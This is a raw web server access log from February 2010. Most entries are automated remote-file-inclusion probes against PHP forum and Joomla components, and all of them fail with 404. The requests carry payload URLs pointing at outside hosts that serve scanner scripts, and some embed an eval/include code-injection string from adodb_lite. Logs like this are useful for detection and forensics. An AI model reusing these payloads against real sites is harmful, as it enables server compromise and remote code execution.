209.126.254.164 - - [15/Feb/2010:02:08:31 -0500] "GET /logs/access_log.Q109102900/bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:08:51 -0500] "GET /bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:08:51 -0500] "GET /logs/bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:08:51 -0500] "GET /logs/access_log.Q109102900/bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:04 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:04 -0500] "GET /logs/error_log.Q110020600%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:06 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:12 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:17 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:17 -0500] "GET /logs/error_log.Q110020600%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:22 -0500] "GET /skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:23 -0500] "GET /logs/access_log.Q109051200/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:09:25 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:10:02 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:10:03 -0500] "GET /logs/access_log.Q110020800%20%20//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:10:03 -0500] "GET //write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:10:21 -0500] "GET /logs/access_log.Q109051900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:10:28 -0500] "GET /logs/access_log.Q110020800%20%20//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:10:28 -0500] "GET //write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:10:29 -0500] "GET /logs/access_log.Q109051900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:10:29 -0500] "GET /logs//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:10:57 -0500] "GET /logs/access_log.Q110011700%20%20//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:11:03 -0500] "GET /skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:11:03 -0500] "GET /logs/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:11:03 -0500] "GET /logs/access_log.Q109051200/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
110.11.20.12 - - [15/Feb/2010:02:11:27 -0500] "GET /logs/access_log.Q110011700%20%20//write_comment_update.php?board_skin_path=http://www.snipeground.com/administrator/components/com_virtuemart/classes/id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:12:39 -0500] "GET /bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:12:39 -0500] "GET /logs/access_log.Q109102900/bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:02:12:40 -0500] "GET /logs/bbs/skin//ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:02:13:57 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
95.108.128.242 - - [15/Feb/2010:02:15:00 -0500] "GET /images/_notes/nav_store_index_off.jpg.mno HTTP/1.1" 200 254 "-" "Yandex/1.01.001 (compatible; Win16; I)"
174.36.1.51 - - [15/Feb/2010:02:15:17 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:15:17 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:15:17 -0500] "GET /logs/access_log.Q109112900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:15:22 -0500] "GET /logs/access_log.Q109080400%20%20//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:15:22 -0500] "GET //v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:15:22 -0500] "GET /logs//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:15:25 -0500] "GET /logs/error_log.Q109112900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:15:38 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:15:38 -0500] "GET /logs/access_log.Q109112900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:15:38 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:15:38 -0500] "GET /logs/error_log.Q109080400%20%20//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:15:44 -0500] "GET /logs/error_log.Q109112900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:16:07 -0500] "GET //v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:16:07 -0500] "GET /logs/access_log.Q109080400%20%20//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:16:07 -0500] "GET /logs//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:16:25 -0500] "GET /logs/error_log.Q109080400%20%20//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:16:40 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:16:40 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:16:40 -0500] "GET /logs/access_log.Q109080700//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:17:00 -0500] "GET /logs/access_log.Q110012800//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:18:05 -0500] "GET /logs/access_log.Q109112900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:07 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:07 -0500] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:07 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
220.181.7.118 - - [15/Feb/2010:02:18:08 -0500] "GET /Includes/ HTTP/1.1" 200 220 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.36.1.51 - - [15/Feb/2010:02:18:10 -0500] "GET /logs/error_log.Q109112900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:11 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:11 -0500] "GET /logs/access_log.Q110020700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:11 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:18:12 -0500] "GET /logs/access_log.Q109112900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:13 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:18:16 -0500] "GET /logs/error_log.Q109112900//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:18:16 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:19:10 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:19:10 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:19:10 -0500] "GET /logs/error_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:19:27 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:19:27 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:19:27 -0500] "GET /logs/error_log.Q109060500%20%20//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://scan.ucoz.net/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:19:39 -0500] "GET /logs/access_log.Q109080700%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
174.36.1.51 - - [15/Feb/2010:02:19:39 -0500] "GET /logs/access_log.Q110012800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:45 -0500] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:45 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:45 -0500] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:45 -0500] "GET /logs/access_log.Q109081500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:49 -0500] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:49 -0500] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:49 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:19:50 -0500] "GET /logs/access_log.Q109081500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
220.181.7.65 - - [15/Feb/2010:02:19:50 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.66.81 - - [15/Feb/2010:02:19:56 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.126.254.139 - - [15/Feb/2010:02:20:00 -0500] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:20:00 -0500] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:20:00 -0500] "GET /logs/access_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:20:20 -0500] "GET /logs/error_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:21:30 -0500] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:21:30 -0500] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:21:30 -0500] "GET /logs/access_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:21:32 -0500] "GET /logs/error_log.Q110013100/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:02:21:42 -0500] "GET /logs/access_log.Q109051200%20%20/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:02:22:05 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.126.254.139 - - [15/Feb/2010:02:22:49 -0500] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:22:49 -0500] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:22:49 -0500] "GET /logs/access_log.Q110013100%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:02:23:04 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015145510301B6008F8B01F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.93.147.154 - - [15/Feb/2010:02:23:09 -0500] "GET /logs/access_log.Q109051200%20%20/skin/zero_vote/login.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:23:21 -0500] "GET /logs/access_log.Q109080400//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:23:31 -0500] "GET /logs/error_log.Q109080400//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:23:45 -0500] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:23:45 -0500] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:23:45 -0500] "GET /logs/access_log.Q109102300%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:24:00 -0500] "GET /logs/access_log.Q110013100%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:24:00 -0500] "GET /logs/access_log.Q109080400//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:24:14 -0500] "GET /logs/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:24:14 -0500] "GET /logs/access_log.Q109102300%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:24:14 -0500] "GET /write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
209.126.254.139 - - [15/Feb/2010:02:24:22 -0500] "GET /logs/error_log.Q110013100%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.15.158.246 - - [15/Feb/2010:02:24:23 -0500] "GET /logs/error_log.Q109080400//v2/cms//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://bimancamp.co.kr/include/ikhy1.txt? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
219.94.194.248 - - [15/Feb/2010:02:24:28 -0500] "GET /logs/access_log.Q110013100%20%20/write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:25:37 -0500] "GET /logs/access_log.Q110020700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:25:37 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
114.108.128.160 - - [15/Feb/2010:02:25:37 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
